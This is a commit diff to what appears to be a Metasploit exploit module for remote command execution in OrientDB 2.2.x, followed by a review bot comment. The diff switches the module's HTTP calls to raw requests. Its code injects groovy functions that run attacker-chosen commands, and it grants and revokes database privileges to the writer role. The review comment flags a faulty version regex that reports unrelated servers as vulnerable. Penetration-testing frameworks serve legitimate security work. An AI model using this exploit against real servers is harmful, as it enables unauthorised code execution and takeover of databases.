
Commit 3066492

author
Ricardo Almeida
committed
Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting windows boxes
1 parent fe5c6dc commit 3066492


1 file changed

+8
-13
lines changed

1 file changed

+8
-13
lines changed

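--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -51,7 +51,7 @@ def initialize(info = {})
 def check
 uri = target_uri
 uri.path = normalize_uri(uri.path)
-res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
+res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
 if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
 print_good("Version: #{res.headers['Server']}")
 return Exploit::CheckCode::Vulnerable
@@ -67,12 +67,11 @@ def http_send_command(cmd, opts = {})
 request_parameters = {
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
-'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
 'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
 }
-res = send_request_cgi(request_parameters)
+res = send_request_raw(request_parameters)
 if not (res and res.code == 201)
 begin
 json_body = JSON.parse(res.body)
@@ -85,12 +84,11 @@ def http_send_command(cmd, opts = {})
 request_parameters = {
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
-'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
 'data' => ""
 }
-req = send_request_cgi(request_parameters)
+req = send_request_raw(request_parameters)
 if not (req and req.code == 200)
 begin
 json_body = JSON.parse(res.body)
@@ -113,12 +111,11 @@ def http_send_command(cmd, opts = {})
 request_parameters = {
 'method' => 'DELETE',
 'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
-'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*' },
 'data' => ""
 }
-rer = send_request_cgi(request_parameters)
+rer = send_request_raw(request_parameters)
 if not (rer and rer.code == 204)
 begin
 json_body = JSON.parse(res.body)
@@ -159,7 +156,7 @@ def execute_command(cmd, opts = {})
 vprint_status("Attempting to execute: #{cmd}")
 @uri = target_uri
 @uri.path = normalize_uri(@uri.path)
-res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
+res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
 if res && res.code == 200 && res.body.length > 0
 begin
 json_body = JSON.parse(res.body)["databases"]
@@ -199,7 +196,7 @@ def linux_stager
 def exploit
 @uri = target_uri
 @uri.path = normalize_uri(@uri.path)
-res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
+res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
 if res && res.code == 200 && res.body.length > 0
 begin
 json_body = JSON.parse(res.body)["databases"]
@@ -221,12 +218,11 @@ def exploit
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
 'vars_get' => { 'format' => 'rid,type,version,class,graph' },
-'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*' },
 'data' => "GRANT #{priv} ON #{item} TO writer"
 }
-res = send_request_cgi(request_parameters)
+res = send_request_raw(request_parameters)
 end
 end
 # Exploit
@@ -249,12 +245,11 @@ def exploit
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
 'vars_get' => { 'format' => 'rid,type,version,class,graph' },
-'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*' },
 'data' => "REVOKE #{priv} ON #{item} FROM writer"
 }
-res = send_request_cgi(request_parameters)
+res = send_request_raw(request_parameters)
 end
 end
 end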
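Review bot: The version pattern in `check` (first hunk) is not grouped, so the alternation splits the whole regex: `1[0-9]` and `2[0-2]` match on their own anywhere in the `Server` header, and a banner from an unrelated or unaffected server that merely contains such digits is reported as `CheckCode::Vulnerable`. Grouping and bounding the patch number would limit the match to the range the pattern appears to intend: `res.headers['Server'] =~ /OrientDB Server v\.2\.2\.(?:[2-9]|1[0-9]|2[0-2])(?!\d)/`. Since the verdict rests on a banner alone, `Exploit::CheckCode::Appears` would describe the evidence more accurately than `Vulnerable`. The body of `check` continues past the end of the hunk.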
